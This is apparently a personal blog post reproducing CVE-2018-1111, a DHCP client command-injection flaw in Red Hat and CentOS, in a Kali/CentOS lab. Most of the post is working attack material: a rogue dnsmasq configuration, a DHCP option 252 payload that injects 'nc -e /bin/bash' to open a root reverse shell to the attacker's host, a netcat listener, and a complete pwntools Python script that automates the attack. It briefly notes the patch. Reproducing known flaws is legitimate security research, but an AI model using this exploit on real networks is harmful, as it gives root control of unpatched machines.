发布日期: 2018-05-20

更新日期: 2023-05-25

文章字数: 517

阅读时长: 3 分

阅读次数:

Recently, Red Hat has released a security update that fixes a remote code execution flaw numbered CVE-2018-1111. An attacker can send a response packet to a fake DHCP server to attack the Red Hat system, get root privileges, and execute arbitrary commands.

Reappearance

environment

kali x64
centos 7
vmware14

Setting Network

Disconnect the networks of kali and centos
Set both kali and centos to host-only mode and turn off the host’s dhcp function
netsetting

Configure kali

Configure kali’s ip and add the route

ifconfig eth0 192.168.131.52 netmask 255.255.255.0
route add default gw 192.168.131.52

Use nc to monitor port 1314

nc -l -p 1314 -v

touch a file named dnsmasq.conf,content is

bind-interfaces 
interface=eth0 
except-interface=lo 
dhcp-range=192.168.131.10,192.168.131.30,22h 
dhcp-option=3,192.168.131.52 
dhcp-option=6,192.168.131.52 
log-queries 
log-facility=/var/log/dnsmasq.log

Using dnsmasq to forge dns servers

dnsmasq -dC dnsmasq.conf --dhcp-option="252,'&nc -e /bin/bash 192.168.131.52 1314 #"

attack_command

Attack

Let Centos connects to the network and finds the ip address gived by kali
centos_ip

Now,in kali,nc getshell of centos,and for root privileges

Principle

The principle has been publish by 360 at 360
Single quotation marks escaped in the script, execute the script directly with root privileges

–dhcp-option=”252,x’&nc -e /bin/bash 10.1.1.1 1337 #”

Range

In locat,test fedora28,centos7 passed,centos6,redhat5 game over

Fixed

yum update dhclient

EXP

#/usr/bin/python
#encoding = utf-8
from pwn import *
import os
import sys
import time

# author : xyzz
# time : 20180520

ip='192.168.131.52'
port=1314
  
# context.log_level='debug'

def pwn(ip,port):
    f=open('dnsmasq.conf','w')
    start = ip[:ip.rfind('.')]+'.10'
    end = ip[:ip.rfind('.')]+'.30'
    dnsmasq = '''
bind-interfaces 
interface=eth0 
except-interface=lo 
dhcp-range={start},{end},22h 
dhcp-option=3,{ip} 
dhcp-option=6,{ip} 
log-queries 
log-facility=/var/log/dnsmasq.log
'''.format(ip=ip,start=start,end=end)
    f.write(dnsmasq)
    f.close()
    cm=[]
    cm.append('ifconfig eth0 {ip} netmask 255.255.255.0 '.format(ip=ip))
    cm.append('route add default gw {ip}'.format(ip=ip))
    cm.append('''dnsmasq -dC dnsmasq.conf --dhcp-option="252,'&nc -e /bin/bash {ip} {port} #"'''.format(ip=ip,port=port))
    q=process('bash')
    for i in range(len(cm)-1):
        q.sendline(cm[i])
        time.sleep(1)
    
    # time.sleep(100)
    p=process('bash')
    p.sendline('nc -l -p {port} -v'.format(port=port))
    q.sendline(cm[-1])
    time.sleep(3)
    p.interactive()
    # q.interactive()

if __name__ == '__main__':
    pwn(ip,port)

exp

Last at last!Congratulations to my Queen 520 for pleasure~~~

xyzz

http://www.xyzzpwn.top

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 xyzz !

DNS RCE

ngrok+esxi+pfsense

With a thinking,try to make a cloud environment to do my job,that i can use a chromebook for a whole day work.for this,I

2018-05-22 trick

Esxi ngrok

synchronize the hexo with github

Recently I move my blog from vps to github with hexo.It’s first time to use hexo.It’s good but I have a question with ho

2018-05-19 devops

hexo github

cve-2018-1111

Reappearance

environment

Setting Network

Configure kali

Attack

Principle

Range

Fixed

EXP